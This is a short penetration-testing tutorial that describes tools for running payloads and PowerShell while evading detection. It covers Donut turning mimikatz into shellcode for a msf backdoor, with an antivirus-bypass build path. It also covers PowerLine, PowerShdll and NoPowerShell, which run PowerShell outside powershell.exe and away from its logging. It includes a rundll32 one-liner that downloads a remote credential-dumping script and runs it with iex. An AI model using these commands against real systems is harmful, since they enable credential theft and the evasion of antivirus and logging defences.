Penetration techniques
msf + Donut: interactive execution of a program
Introduction
Tool: Donut
Donut generates x86 or x64 shellcode from VBScript, JScript, EXE and DLL files (including .NET assemblies). The shellcode can be injected into an arbitrary Windows process for in-memory execution.
Instructions
- First generate a backdoor program with msf, then execute it.
- Then execute
./donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -o /tmp/payload.bin
-a: specifies the bitness; 2 means 64-bit
-o: specifies the output file
- Execute the module with msf and you get an interactive mimikatz.
Methods of running PowerShell without powershell.exe
PowerLine
Introduction
It is a tool written in C# that supports both local command-line invocation and remote invocation. It can run PowerShell scripts without directly invoking PowerShell. Its advantages are as follows:
- Automatically identifies Windows 7 and Windows 10 systems
- Easy to use; no complicated IDE required
- Automatic XOR encoding
- …
Usage
- First pull the project to the local machine, then run the build.bat file.
- Then fill in the path of the PowerShell script you need to call in the UserConf.xml file. By default it ships with PowerUp, PowerView, Mimikatz, etc.; just add the path of your own PS script following the format the author provides.
- After the addition is complete, run PLBuilder.exe to build.
PowerShdll
Introduction
It mainly uses a DLL to run PowerShell without going through powershell.exe, so it has a certain degree of AV-bypass capability. It can also be run under rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe or regsvr32.exe, or executed via the standalone exe provided by the author.
Usage
- Use PowerShdll -i to enter interactive mode; you then get an interactive PS environment in which you can execute any PowerShell command.
- DLL version usage:
rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;
Nopowershell
Introduction
NoPowerShell is a tool implemented in C# that supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanism. A CNA script for Cobalt Strike (CS) is also provided.
Usage
.\NoPowerShell.exe
Run it directly to display the available version and help commands.